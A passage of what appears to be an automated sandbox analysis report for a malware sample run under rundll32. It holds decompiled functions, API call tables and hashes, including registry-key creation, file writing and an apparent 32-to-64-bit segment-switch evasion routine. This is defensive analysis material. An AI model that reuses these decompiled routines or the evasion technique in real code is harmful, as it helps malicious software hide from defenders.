                                                            					E0465F190(_t69);
                                                            					goto L15;
                                                            				}
                                                            				_t20 = _t55 + 8; // 0x9
                                                            				asm("sbb eax, eax");
                                                            				_t48 = _t40 & _t20;
                                                            				_t21 = _t55 + 8; // 0x9
                                                            				_t63 = _t21;
                                                            				if((_t40 & _t20) > 0x400) {
                                                            					asm("sbb eax, eax");
                                                            					_t69 = E046684E7(_t63, _t48 & _t63);
                                                            					if(_t69 == 0) {
                                                            						goto L14;
                                                            					}
                                                            					 *_t69 = 0xdddd;
                                                            					L9:
                                                            					_t69 =  &(_t69[4]);
                                                            					goto L11;
                                                            				}
                                                            				asm("sbb eax, eax");
                                                            				E04671860();
                                                            				_t69 = _t71;
                                                            				if(_t69 == 0) {
                                                            					goto L14;
                                                            				}
                                                            				 *_t69 = 0xcccc;
                                                            				goto L9;
                                                            			}
                                                            0x0466c282
                                                            0x0466c289
                                                            0x0466c295
                                                            0x0466c29a
                                                            0x0466c29f
                                                            0x0466c2a4
                                                            0x0466c2a7
                                                            0x0466c2a9
                                                            0x0466c2a9
                                                            0x0466c2ae
                                                            0x0466c2c7
                                                            0x0466c2cd
                                                            0x0466c2d2
                                                            0x0466c371
                                                            0x0466c375
                                                            0x0466c37a
                                                            0x0466c37a
                                                            0x0466c396
                                                            0x0466c396
                                                            0x0466c2d8
                                                            0x0466c2db
                                                            0x0466c2e0
                                                            0x0466c2e4
                                                            0x0466c330
                                                            0x0466c332
                                                            0x0466c334
                                                            0x0466c339
                                                            0x0466c350
                                                            0x0466c358
                                                            0x0466c368
                                                            0x0466c368
                                                            0x0466c358
                                                            0x0466c36a
                                                            0x0466c36b
                                                            0x00000000
                                                            0x0466c370
                                                            0x0466c2e6
                                                            0x0466c2eb
                                                            0x0466c2ed
                                                            0x0466c2ef
                                                            0x0466c2ef
                                                            0x0466c2f7
                                                            0x0466c314
                                                            0x0466c31e
                                                            0x0466c323
                                                            0x00000000
                                                            0x00000000
                                                            0x0466c325
                                                            0x0466c32b
                                                            0x0466c32b
                                                            0x00000000
                                                            0x0466c32b
                                                            0x0466c2fb
                                                            0x0466c2ff
                                                            0x0466c304
                                                            0x0466c308
                                                            0x00000000
                                                            0x00000000
                                                            0x0466c30a
                                                            0x00000000

                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,0466AE40,?,00000000,00000001,00000001,?,?,00000001,0466AE40,?), ref: 0466C2C7
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0466C350
                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0465FA21,?), ref: 0466C362
                                                            • __freea.LIBCMT ref: 0466C36B
                                                              • Part of subcall function 046684E7: RtlAllocateHeap.NTDLL(00000000,00000001,00000004), ref: 04668519
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                            • String ID:
                                                            • API String ID: 2652629310-0
                                                            • Opcode ID: 1420e1efffdd943b141f6ef290d640666d6f1b7b0f94b83e18f34abfebccf793
                                                            • Instruction ID: 3e3394bfa702eb203b40107253674cef7d4421b1976ea213561d8f6cef6c1965
                                                            • Opcode Fuzzy Hash: 1420e1efffdd943b141f6ef290d640666d6f1b7b0f94b83e18f34abfebccf793
                                                            • Instruction Fuzzy Hash: 6331C372A0061AABDF259F69CC44DAE7BA5EF50714F044128FC16E7250FB35ED50CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 34%
                                                            			E0464D5B0(signed int __eax, void* __ebx, char** __ecx, void* __edi, void* __esi, int _a4, int _a8) {
                                                            				char* _v0;
                                                            				signed int _t15;
                                                            				short* _t16;
                                                            				signed int _t19;
                                                            				signed short _t27;
                                                            				char* _t31;
                                                            				short* _t36;
                                                            				short _t39;
                                                            				char** _t40;
                                                            				char** _t41;
                                                            				short* _t43;
                                                            				int _t44;
                                                            				char* _t48;
                                                            				int _t51;
                                                            				void* _t54;
                                                            				char** _t56;
                                                            				int _t58;
                                                            				void* _t62;
                                                            				void* _t66;
                                                            				void* _t67;
                                                            
                                                            				_t15 = __eax;
                                                            				_t62 = _t66;
                                                            				_t36 = _a4;
                                                            				_t46 = __ecx;
                                                            				if(_t36 != 0) {
                                                            					_t16 = _t36;
                                                            					_t43 =  &(_t16[1]);
                                                            					do {
                                                            						_t39 =  *_t16;
                                                            						_t16 =  &(_t16[1]);
                                                            					} while (_t39 != 0);
                                                            					_t19 = (_t16 - _t43 >> 1) + 1;
                                                            					_a4 = _t19;
                                                            					_push(_t39);
                                                            					_t51 = _t19 * 4;
                                                            					_t40 = __ecx;
                                                            					_t44 = _t51;
                                                            					_push( &(__ecx[1]));
                                                            					L12();
                                                            					_t67 = _t66 + 8;
                                                            					_t15 = WideCharToMultiByte(_a8, 0, _t36, _a4,  *__ecx, _t51, 0, 0);
                                                            					asm("sbb esi, esi");
                                                            					_t54 =  ~_t15 + 1;
                                                            					if(_t54 != 0) {
                                                            						_t15 = GetLastError();
                                                            						if(_t15 == 0x7a) {
                                                            							_t58 = WideCharToMultiByte(_a8, 0, _t36, _a4, 0, 0, 0, 0);
                                                            							_push(_t40);
                                                            							_push( &(_t46[1]));
                                                            							_t44 = _t58;
                                                            							L12();
                                                            							_t67 = _t67 + 8;
                                                            							_t15 = WideCharToMultiByte(_a8, 0, _t36, _a4,  *_t46, _t58, 0, 0);
                                                            							asm("sbb esi, esi");
                                                            							_t54 =  ~_t15 + 1;
                                                            						}
                                                            					}
                                                            					_pop(_t55);
                                                            					if(_t54 == 0) {
                                                            						goto L2;
                                                            					} else {
                                                            						_t21 =  *_t46;
                                                            						_t41 =  &(_t46[1]);
                                                            						if( *_t46 != _t41) {
                                                            							L0465ED17(_t21);
                                                            							_t67 = _t67 + 4;
                                                            						}
                                                            						L32();
                                                            						asm("int3");
                                                            						_push(_t62);
                                                            						_t56 = _t41;
                                                            						_push(_t46);
                                                            						if(_t56 == 0) {
                                                            							_push(0x80070057);
                                                            							E04637AC0();
                                                            							goto L28;
                                                            						} else {
                                                            							if(_t44 < 0) {
                                                            								L28:
                                                            								_push(0x80070057);
                                                            								E04637AC0();
                                                            								goto L29;
                                                            							} else {
                                                            								_t48 = _v0;
                                                            								if(_t48 == 0) {
                                                            									L29:
                                                            									_push(0x80070057);
                                                            									E04637AC0();
                                                            									goto L30;
                                                            								} else {
                                                            									_t31 =  *_t56;
                                                            									if(_t31 == _t48) {
                                                            										if(_t44 <= 0x80) {
                                                            											goto L20;
                                                            										} else {
                                                            											_push(1);
                                                            											_push(_t44);
                                                            											_t31 = E0466718E(_t41);
                                                            											goto L25;
                                                            										}
                                                            										goto L21;
                                                            									} else {
                                                            										if(_t44 <= 0x80) {
                                                            											_t31 = L0465ED17(_t31);
                                                            											L20:
                                                            											 *_t56 = _t48;
                                                            											goto L21;
                                                            										} else {
                                                            											_push(1);
                                                            											_push(_t44);
                                                            											_t31 = E04661785(_t31);
                                                            											if(_t31 != 0) {
                                                            												L25:
                                                            												 *_t56 = _t31;
                                                            												L21:
                                                            												if( *_t56 != 0) {
                                                            													return _t31;
                                                            												} else {
                                                            													goto L31;
                                                            												}
                                                            											} else {
                                                            												L30:
                                                            												_push(0x8007000e);
                                                            												E04637AC0();
                                                            												L31:
                                                            												_push(0x8007000e);
                                                            												E04637AC0();
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												_t27 = GetLastError();
                                                            												if(_t27 > 0) {
                                                            													_t27 = _t27 & 0x0000ffff | 0x80070000;
                                                            												}
                                                            												_push(_t27);
                                                            												E04637AC0();
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												return 0x4687b60;
                                                            											}
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				} else {
                                                            					 *__ecx = _t36;
                                                            					L2:
                                                            					return _t15;
                                                            				}
                                                            			}
                                                            0x0464d5b0
                                                            0x0464d5b1
                                                            0x0464d5b4
                                                            0x0464d5b8
                                                            0x0464d5bc
                                                            0x0464d5c6
                                                            0x0464d5c8
                                                            0x0464d5d0
                                                            0x0464d5d0
                                                            0x0464d5d3
                                                            0x0464d5d6
                                                            0x0464d5df
                                                            0x0464d5e1
                                                            0x0464d5e4
                                                            0x0464d5e5
                                                            0x0464d5ec
                                                            0x0464d5f1
                                                            0x0464d5f3
                                                            0x0464d5f4
                                                            0x0464d5f9
                                                            0x0464d60c
                                                            0x0464d616
                                                            0x0464d618
                                                            0x0464d61b
                                                            0x0464d61d
                                                            0x0464d626
                                                            0x0464d63f
                                                            0x0464d644
                                                            0x0464d645
                                                            0x0464d646
                                                            0x0464d64a
                                                            0x0464d64f
                                                            0x0464d662
                                                            0x0464d66c
                                                            0x0464d66e
                                                            0x0464d66e
                                                            0x0464d626
                                                            0x0464d671
                                                            0x0464d672
                                                            0x00000000
                                                            0x0464d678
                                                            0x0464d678
                                                            0x0464d67a
                                                            0x0464d67f
                                                            0x0464d682
                                                            0x0464d687
                                                            0x0464d687
                                                            0x0464d68a
                                                            0x0464d68f
                                                            0x0464d690
                                                            0x0464d694
                                                            0x0464d696
                                                            0x0464d699
                                                            0x0464d6f3
                                                            0x0464d6f8
                                                            0x00000000
                                                            0x0464d69b
                                                            0x0464d69d
                                                            0x0464d6fd
                                                            0x0464d6fd
                                                            0x0464d702
                                                            0x00000000
                                                            0x0464d69f
                                                            0x0464d69f
                                                            0x0464d6a4
                                                            0x0464d707
                                                            0x0464d707
                                                            0x0464d70c
                                                            0x00000000
                                                            0x0464d6a6
                                                            0x0464d6a6
                                                            0x0464d6aa
                                                            0x0464d6e0
                                                            0x00000000
                                                            0x0464d6e2
                                                            0x0464d6e2
                                                            0x0464d6e4
                                                            0x0464d6e5
                                                            0x00000000
                                                            0x0464d6ea
                                                            0x00000000
                                                            0x0464d6ac
                                                            0x0464d6b2
                                                            0x0464d6c7
                                                            0x0464d6cf
                                                            0x0464d6cf
                                                            0x00000000
                                                            0x0464d6b4
                                                            0x0464d6b4
                                                            0x0464d6b6
                                                            0x0464d6b8
                                                            0x0464d6c2
                                                            0x0464d6ed
                                                            0x0464d6ed
                                                            0x0464d6d1
                                                            0x0464d6d6
                                                            0x0464d6f2
                                                            0x0464d6d8
                                                            0x00000000
                                                            0x0464d6d8
                                                            0x0464d6c4
                                                            0x0464d711
                                                            0x0464d711
                                                            0x0464d716
                                                            0x0464d71b
                                                            0x0464d71b
                                                            0x0464d720
                                                            0x0464d725
                                                            0x0464d726

                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 0464D60C
                                                            • GetLastError.KERNEL32(?,00000000,00000000), ref: 0464D61D
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0464D639
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0464D662
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                            • String ID:
                                                            • API String ID: 1717984340-0
                                                            • Opcode ID: a68b12516e1caf5dc784f78550b00a930eb7dcf2aa7e3327686dec3e9a3d80c0
                                                            • Instruction ID: 0017451d2200df9b143920cfc6b3d9942a77b7fb6d955951d693907617299e56
                                                            • Opcode Fuzzy Hash: a68b12516e1caf5dc784f78550b00a930eb7dcf2aa7e3327686dec3e9a3d80c0
                                                            • Instruction Fuzzy Hash: 6A21E272A00211BBEF240F54DC45FAA7B69EF44B54F248215FD099B290FB71BD20CA94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 61%
                                                            			E046410F0(intOrPtr __ecx, intOrPtr* _a4, void* _a8) {
                                                            				long _v8;
                                                            				intOrPtr _v12;
                                                            				int _v16;
                                                            				void** _v20;
                                                            				char _v24;
                                                            				char _t26;
                                                            				void* _t28;
                                                            				long _t29;
                                                            				void* _t37;
                                                            				void* _t42;
                                                            				void* _t43;
                                                            				char* _t45;
                                                            				void** _t49;
                                                            				void* _t51;
                                                            				intOrPtr _t52;
                                                            				short* _t53;
                                                            
                                                            				_t42 = _a8;
                                                            				_t49 = _a4 + 1;
                                                            				_v12 = __ecx;
                                                            				_v20 = _t49;
                                                            				_t26 = _t42 - 1 + _t49;
                                                            				_v16 = 0;
                                                            				_v24 = _t26;
                                                            				if(_t26 - _t49 >= 4) {
                                                            					_t51 =  *_t49;
                                                            					_v20 =  &(_t49[1]);
                                                            				} else {
                                                            					_v16 = 1;
                                                            					_t51 = 0;
                                                            				}
                                                            				_t45 =  &_v24;
                                                            				_t28 = E04640D20(_t45);
                                                            				_t53 = _t28;
                                                            				if(_v16 == 0) {
                                                            					_t29 = _t42 + 4;
                                                            					_v8 = _t29;
                                                            					_t43 = LocalAlloc(0x40, _t29);
                                                            					E0465E060(_t43, _a4, _a8);
                                                            					_a8 = 0;
                                                            					_a4 = _a8 + _t43;
                                                            					RegCreateKeyExW(_t51, _t53, 0, 0, 0, 0x104, 0,  &_a8, 0);
                                                            					asm("sbb edi, edi");
                                                            					_t37 = _a8;
                                                            					_t52 = _t51 + 1;
                                                            					if(_t37 != 0) {
                                                            						RegCloseKey(_t37);
                                                            					}
                                                            					_push(_t45);
                                                            					_push(0x3f);
                                                            					_push(_v8);
                                                            					 *_a4 = _t52;
                                                            					_push(_t43);
                                                            					E04631C60( *((intOrPtr*)(_v12 + 4)));
                                                            					_t28 = LocalFree(_t43);
                                                            					if(_t53 != 0) {
                                                            						return L04655B0F(_t53);
                                                            					}
                                                            				}
                                                            				return _t28;
                                                            			}

                                                            APIs
                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 0464114C
                                                            • RegCreateKeyExW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 04641187
                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 0464119A
                                                            • LocalFree.KERNEL32(00000000,00000000,?,0000003F,?,?,00000000,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 046411B8
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$AllocCloseCreateFree
                                                            • String ID:
                                                            • API String ID: 1942913825-0
                                                            • Opcode ID: d4d4c5bf4e1bfa0fc85fa144bcb9b506c9d71a8a8a9bb6512914a15670d6f2f3
                                                            • Instruction ID: 618d6ebd35a3e6998a8ca5323776457b7f7a2708be26de7ff1adc20d98baa711
                                                            • Opcode Fuzzy Hash: d4d4c5bf4e1bfa0fc85fa144bcb9b506c9d71a8a8a9bb6512914a15670d6f2f3
                                                            • Instruction Fuzzy Hash: 3F2173B1A00208BBDF04DF65CC48FDEBBB8EF85750F108125F905AB281E775AA44CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 51%
                                                            			E04635910(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
                                                            				signed int _v8;
                                                            				intOrPtr _v15;
                                                            				long _v19;
                                                            				char _v20;
                                                            				char _v24;
                                                            				long _v28;
                                                            				long _v32;
                                                            				long _v36;
                                                            				void* _v40;
                                                            				signed int _t26;
                                                            				WCHAR* _t32;
                                                            				char* _t34;
                                                            				long _t44;
                                                            				intOrPtr* _t46;
                                                            				void* _t54;
                                                            				void* _t56;
                                                            				signed int _t57;
                                                            
                                                            				_t26 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t26 ^ _t57;
                                                            				_t54 = __ecx;
                                                            				_v32 = 0;
                                                            				_t46 = _a4;
                                                            				_t44 =  *(_t46 + 4);
                                                            				_v40 = _t46 + 8;
                                                            				_v28 =  *_t46;
                                                            				_v36 = _a8 + 0xfffffff8;
                                                            				_t32 = __ecx + 0x18;
                                                            				if( *((intOrPtr*)(__ecx + 0x2c)) >= 8) {
                                                            					_t32 =  *_t32;
                                                            				}
                                                            				_t56 = CreateFileW(_t32, 0x40000000, 2, 0, 3, 0x80, 0);
                                                            				if(_t56 == 0xffffffff) {
                                                            					_push(_t46);
                                                            					_push(0x3f);
                                                            					_v24 = 0x73;
                                                            					_t34 =  &_v24;
                                                            					_push(1);
                                                            				} else {
                                                            					SetFilePointer(_t56, _t44,  &_v28, 0);
                                                            					WriteFile(_t56, _v40, _v36,  &_v32, 0);
                                                            					CloseHandle(_t56);
                                                            					_v20 = 0x71;
                                                            					_push(_t46);
                                                            					asm("adc eax, 0x0");
                                                            					_v15 = _t44 + _v32;
                                                            					_push(0x3f);
                                                            					_v19 = _v28;
                                                            					_t34 =  &_v20;
                                                            					_push(9);
                                                            				}
                                                            				E04631C60( *((intOrPtr*)(_t54 + 4)));
                                                            				return E04655AFE(_v8 ^ _t57, _t34);
                                                            			}

                                                            APIs
                                                            • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000003,00000080,00000000,?), ref: 04635964
                                                            • SetFilePointer.KERNEL32(00000000,?,?,00000000), ref: 04635979
                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 0463598C
                                                            • CloseHandle.KERNEL32(00000000), ref: 04635993
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$CloseCreateHandlePointerWrite
                                                            • String ID:
                                                            • API String ID: 3604237281-0
                                                            • Opcode ID: be3c0c8e57212970905d7b6f09dd167bbb862cd7f012a2e80da3df576383d264
                                                            • Instruction ID: 066b2e3f3a724e405b431cc8b97bf1e316ba7e1ef1c6eee1fe48aad578309f17
                                                            • Opcode Fuzzy Hash: be3c0c8e57212970905d7b6f09dd167bbb862cd7f012a2e80da3df576383d264
                                                            • Instruction Fuzzy Hash: 31214171A00209BFEB04DFA4CC45FEEB7B8EF09725F104159E615A72C0EB75AA45CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 27%
                                                            			E046488AE() {
                                                            				signed int _t71;
                                                            
                                                            				__eax =  *(__ebp - 0x150);
                                                            				__esi = GetProcessHeap;
                                                            				__eax =  *(__ebp - 0x150) << 2;
                                                            				 *(__ebp - 0x11c) =  *(__ebp - 0x150) << 2;
                                                            				__eax =  *0x4687ae0; // 0x2aa0000
                                                            				__eflags = __eax;
                                                            				if(__eax == 0) {
                                                            					__eax = GetProcessHeap();
                                                            					 *0x4687ae0 = __eax;
                                                            				}
                                                            				__eax = RtlAllocateHeap(__eax, 0,  *(__ebp - 0x11c));
                                                            				 *(__ebp - 0x13c) = __eax;
                                                            				__eflags = __eax;
                                                            				if(__eax == 0) {
                                                            					return E04655AFE( *(_t71 - 4) ^ _t71);
                                                            				} else {
                                                            					__eax =  *(__ebp - 0x150);
                                                            					__ecx =  *(__ebp - 0x148);
                                                            					__edx =  *(__ebp - 0x150) * 4;
                                                            					__eax = 0;
                                                            					__ecx =  *(__ebp - 0x148) + __ebx;
                                                            					asm("adc eax, edi");
                                                            					__ecx =  *(__ebp - 0x13c);
                                                            					L04648310( *(__ebp - 0x13c),  *(__ebp - 0x150) * 4,  *(__ebp - 0x148) + __ebx, 0) =  *(__ebp - 0x150);
                                                            					__eax =  *(__ebp - 0x150) +  *(__ebp - 0x150);
                                                            					 *(__ebp - 0x11c) =  *(__ebp - 0x150) +  *(__ebp - 0x150);
                                                            					__eax =  *0x4687ae0; // 0x2aa0000
                                                            					__eflags = __eax;
                                                            					if(__eax == 0) {
                                                            						__eax = GetProcessHeap();
                                                            						 *0x4687ae0 = __eax;
                                                            					}
                                                            					__eax = RtlAllocateHeap(__eax, 0,  *(__ebp - 0x11c));
                                                            					 *(__ebp - 0x134) = __eax;
                                                            					__eflags = __eax;
                                                            					if(__eax != 0) {
                                                            						__eax =  *(__ebp - 0x150);
                                                            						__ecx =  *(__ebp - 0x140);
                                                            						__edx =  *(__ebp - 0x150) +  *(__ebp - 0x150);
                                                            						__eax = 0;
                                                            						__ecx =  *(__ebp - 0x140) + __ebx;
                                                            						asm("adc eax, edi");
                                                            						__ecx =  *(__ebp - 0x134);
                                                            						L04648310( *(__ebp - 0x134),  *(__ebp - 0x150) +  *(__ebp - 0x150),  *(__ebp - 0x140) + __ebx, 0) =  *(__ebp - 0x14c);
                                                            						__eax =  *(__ebp - 0x14c) << 2;
                                                            						 *(__ebp - 0x11c) =  *(__ebp - 0x14c) << 2;
                                                            						__eax =  *0x4687ae0;
                                                            						__eflags = __eax;
                                                            						if(__eax == 0) {
                                                            							__eax =  *__esi();
                                                            							 *0x4687ae0 = __eax;
                                                            						}
                                                            						__esi = __eax;
                                                            						 *(__ebp - 0x138) = __esi;
                                                            						__eflags = __esi;
                                                            						if(__esi != 0) {
                                                            							__eax =  *(__ebp - 0x14c);
                                                            							__ecx =  *(__ebp - 0x144);
                                                            							__edx =  *(__ebp - 0x14c) * 4;
                                                            							__eax = 0;
                                                            							__ecx =  *(__ebp - 0x144) + __ebx;
                                                            							asm("adc eax, edi");
                                                            							__ecx = __esi;
                                                            							__eax = L04648310(__esi,  *(__ebp - 0x14c) * 4,  *(__ebp - 0x144) + __ebx, 0);
                                                            							__esi =  *(__ebp - 0x150);
                                                            							__ecx = 0;
                                                            							 *(__ebp - 0x11c) = 0;
                                                            							__eflags = __esi;
                                                            							if(__esi == 0) {
                                                            								L30:
                                                            								asm("xorps xmm0, xmm0");
                                                            								asm("movlpd [ebp-0x120], xmm0");
                                                            							} else {
                                                            								asm("o16 nop [eax+eax]");
                                                            								do {
                                                            									__eax =  *(__ebp - 0x138);
                                                            									__edx =  *( *(__ebp - 0x138) + __ecx * 4);
                                                            									__eax = 0;
                                                            									__edx =  *( *(__ebp - 0x138) + __ecx * 4) + __ebx;
                                                            									asm("adc eax, edi");
                                                            									__eflags = __edx;
                                                            									if(__edx != 0) {
                                                            										L17:
                                                            										 *((char*)(__ebp - 0x111)) = 0;
                                                            										 *(__ebp - 0x130) = __edx;
                                                            										 *(__ebp - 0x12c) = __eax;
                                                            										_push(0x33);
                                                            										L18();
                                                            										 *__esp =  *__esp + 5;
                                                            										asm("retf");
                                                            										_push(__esi);
                                                            										__edi = "LdrGetProcedureAddress";
                                                            										__eax = __eax - 1;
                                                            										__esi =  *(__ebp - 0x130);
                                                            										__ecx = 0x17;
                                                            										0x17 = 3;
                                                            										__ecx = 0x17 >> 2;
                                                            										__eflags = 0x17 >> 2;
                                                            										asm("repe cmpsd");
                                                            										if(0x17 >> 2 == 0) {
                                                            											__eflags = 0x17;
                                                            											if(0x17 == 0) {
                                                            												L24:
                                                            												 *((char*)(__ebp - 0x111)) = 1;
                                                            											} else {
                                                            												__eflags = 0x17 - 1;
                                                            												if(0x17 == 1) {
                                                            													L23:
                                                            													asm("cmpsb");
                                                            													if(__eflags == 0) {
                                                            														goto L24;
                                                            													}
                                                            												} else {
                                                            													asm("cmpsw");
                                                            													if(0x17 == 1) {
                                                            														__eflags = 3 - 2;
                                                            														if(3 == 2) {
                                                            															goto L24;
                                                            														} else {
                                                            															goto L23;
                                                            														}
                                                            													}
                                                            												}
                                                            											}
                                                            										}
                                                            										_pop(__esi);
                                                            										L26();
                                                            										 *((intOrPtr*)(__esp + 4)) = 0x23;
                                                            										 *__esp =  *__esp + 0xd;
                                                            										asm("retf");
                                                            										__eflags =  *((char*)(__ebp - 0x111));
                                                            										__ecx =  *(__ebp - 0x11c);
                                                            										if( *((char*)(__ebp - 0x111)) != 0) {
                                                            											__eax =  *(__ebp - 0x134);
                                                            											__ecx =  *( *(__ebp - 0x134) + __ecx * 2) & 0x0000ffff;
                                                            											__eax =  *(__ebp - 0x13c);
                                                            											__eax =  *( *(__ebp - 0x13c) + __ecx * 4);
                                                            											__ecx = 0;
                                                            											 *(__ebp - 0x120) = __eax;
                                                            											asm("adc ecx, [ebp-0x128]");
                                                            											 *(__ebp - 0x11c) = 0;
                                                            										} else {
                                                            											__esi =  *(__ebp - 0x150);
                                                            											__ebx =  *((intOrPtr*)(__ebp - 0x124));
                                                            											__edi =  *(__ebp - 0x128);
                                                            											goto L29;
                                                            										}
                                                            									} else {
                                                            										__eflags = 0;
                                                            										if(0 == 0) {
                                                            											goto L29;
                                                            										} else {
                                                            											goto L17;
                                                            										}
                                                            									}
                                                            									goto L31;
                                                            									L29:
                                                            									__ecx = __ecx + 1;
                                                            									 *(__ebp - 0x11c) = __ecx;
                                                            									__eflags = __ecx - __esi;
                                                            								} while (__ecx < __esi);
                                                            								goto L30;
                                                            							}
                                                            							L31:
                                                            							__eax =  *(__ebp - 0x138);
                                                            							__eflags = __eax;
                                                            							if(__eax != 0) {
                                                            								__eax = L0465ED17(__eax);
                                                            								 *(__ebp - 0x138) = 0;
                                                            							}
                                                            						} else {
                                                            							asm("xorps xmm0, xmm0");
                                                            							asm("movlpd [ebp-0x120], xmm0");
                                                            						}
                                                            						__eax =  *(__ebp - 0x134);
                                                            						__eflags = __eax;
                                                            						if(__eax != 0) {
                                                            							__eax = L0465ED17(__eax);
                                                            							 *(__ebp - 0x134) = 0;
                                                            						}
                                                            					} else {
                                                            						asm("xorps xmm0, xmm0");
                                                            						asm("movlpd [ebp-0x120], xmm0");
                                                            					}
                                                            					__eax =  *(__ebp - 0x13c);
                                                            					__eflags = __eax;
                                                            					if(__eax != 0) {
                                                            						__eax = L0465ED17(__eax);
                                                            					}
                                                            					__ecx =  *(__ebp - 4);
                                                            					__eax =  *(__ebp - 0x120);
                                                            					__ecx =  *(__ebp - 4) ^ __ebp;
                                                            					__eflags = __ecx;
                                                            					__edx =  *(__ebp - 0x11c);
                                                            					_pop(__esi);
                                                            					_pop(__ebx);
                                                            					__eax = E04655AFE(__ecx);
                                                            					__esp = __ebp;
                                                            					_pop(__ebp);
                                                            					return __eax;
                                                            				}
                                                            			}


                                                            APIs
                                                            • GetProcessHeap.KERNEL32 ref: 046488D8
                                                            • RtlAllocateHeap.NTDLL(02AA0000,00000000,?), ref: 046488E8
                                                            • GetProcessHeap.KERNEL32 ref: 0464893C
                                                            • RtlAllocateHeap.NTDLL(02AA0000,00000000,?), ref: 0464894C
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocateProcess
                                                            • String ID:
                                                            • API String ID: 1357844191-0
                                                            • Opcode ID: cb7f457e8d0849ef9d89a574c1cfa55392e204d8b541a699042a38196027d5ef
                                                            • Instruction ID: 364c2528d09a19f822d9122a703cb4816be9171642a5466ebc447ce9dd9e612d
                                                            • Opcode Fuzzy Hash: cb7f457e8d0849ef9d89a574c1cfa55392e204d8b541a699042a38196027d5ef
                                                            • Instruction Fuzzy Hash: 64210975A002299BDF24DF69DC85BDAB7B4FB98351F1051999809E3300F634AE908F80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0464EAF0(intOrPtr* __ecx, intOrPtr _a4) {
                                                            				intOrPtr _t27;
                                                            				intOrPtr _t33;
                                                            				intOrPtr _t39;
                                                            				intOrPtr _t40;
                                                            				intOrPtr* _t41;
                                                            				struct _CRITICAL_SECTION* _t42;
                                                            
                                                            				_t41 = __ecx;
                                                            				_t42 = __ecx + 0x14c;
                                                            				EnterCriticalSection(_t42);
                                                            				if( *((intOrPtr*)( *_t41 + 0x40))() != 0) {
                                                            					_t40 = _a4;
                                                            					_t33 =  *((intOrPtr*)(_t41 + 0x180));
